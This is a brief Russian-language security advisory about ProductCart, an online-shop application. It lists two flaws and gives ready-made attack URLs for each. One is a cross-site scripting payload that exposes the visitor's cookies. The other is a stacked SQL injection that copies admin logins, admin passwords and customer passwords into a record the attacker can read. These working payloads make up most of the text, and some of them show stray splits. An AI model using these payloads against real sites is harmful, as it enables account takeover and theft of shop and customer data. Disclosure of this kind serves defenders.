Программа: ProductCart
Несколько уязвимостей обнаружено в ProductCart. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.
1. XSS:
http://[target]/productcart/pc/Custva.asp?redirectUrl=">
<script>alert(document.c ookie)</script><"
2. SQL инъекция:
http://www.shop.com/productcart/pc/advSearch_h.asp?
idcategory=0&idSupplier=10&customfield=0&priceUntil=999;
update%20customers%20set%20name=
(select%20top%201%20idadmin%20from%20admins), lastName=(select%20top%01%20adminpassword%20from%20admins),
phone=(select%20password%20from%20customers%20where%20 zip=987654)
%20where%20zip=987654;s--elect%20*%20from%20products%20 where%201=1&Submit.y=13&priceFrom=0
&sku=&keyWord=dark&IDBrand=0 &resultCnt=200&Submit.x=33&